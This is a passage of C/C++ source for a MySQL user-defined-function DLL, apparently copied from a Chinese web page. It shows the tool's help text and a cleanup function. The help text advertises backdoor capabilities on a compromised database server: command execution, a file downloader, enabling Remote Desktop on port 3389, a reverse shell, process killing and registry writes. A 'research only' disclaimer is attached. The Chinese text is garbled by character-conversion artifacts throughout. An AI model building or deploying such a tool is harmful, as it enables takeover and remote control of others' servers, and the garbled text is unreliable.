strcat(initid->ptr,"使用函數(shù):select 函數(shù)名(參數(shù)列表);獲取參數(shù)信息可使用select 函數(shù)名(\"help\");\r\n");
strcat(initid->ptr,"--------------------------------------------------------------------\r\n");
strcat(initid->ptr,"本dll包含的函數(shù):\r\n");
strcat(initid->ptr,"cmdshell 執(zhí)行cmd;\r\n");
strcat(initid->ptr,"downloader 下載者,到網(wǎng)上下載指定文件并保存到指定目錄;\r\n");
strcat(initid->ptr,"open3389 通用開3389終端服務(wù),可指定端口(不改端口無需重啟);\r\n");
strcat(initid->ptr,"backshell 反彈Shell;\r\n");
strcat(initid->ptr,"ProcessView 枚舉系統(tǒng)進(jìn)程;\r\n");
strcat(initid->ptr,"KillProcess 終止指定進(jìn)程;\r\n");
strcat(initid->ptr,"regread 讀注冊表;\r\n");
strcat(initid->ptr,"regwrite 寫注冊表;\r\n");
strcat(initid->ptr,"shut 關(guān)機(jī),注銷,重啟;\r\n");
strcat(initid->ptr,"about 本函數(shù);\r\n");
strcat(initid->ptr,"--------------------------------------------------------------------\r\n");
strcat(initid->ptr,"DLL中的每個(gè)函數(shù)都經(jīng)多次測試，不太可能會(huì)造成MYSQL假死等現(xiàn)象，但也不排除在特殊環(huán)境、特殊輸入下出錯(cuò)的可能性.\r\n");
strcat(initid->ptr,"使用過程中發(fā)現(xiàn)的bug可和我聯(lián)系QQ:185826531(langouster)\r\n");
strcat(initid->ptr,"源程序公開,可以任意修改和添加功能,散布源程序請(qǐng)注明原作者.\r\n\r\n");
strcat(initid->ptr,"特別聲明:本程序只供技術(shù)研究之用,不正當(dāng)使用程序造成的后果作者概不負(fù)責(zé)!");
*length=strlen(initid->ptr);
return initid->ptr;

}
extern "C" __declspec(dllexport)void about_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}

您可能感興趣的文章: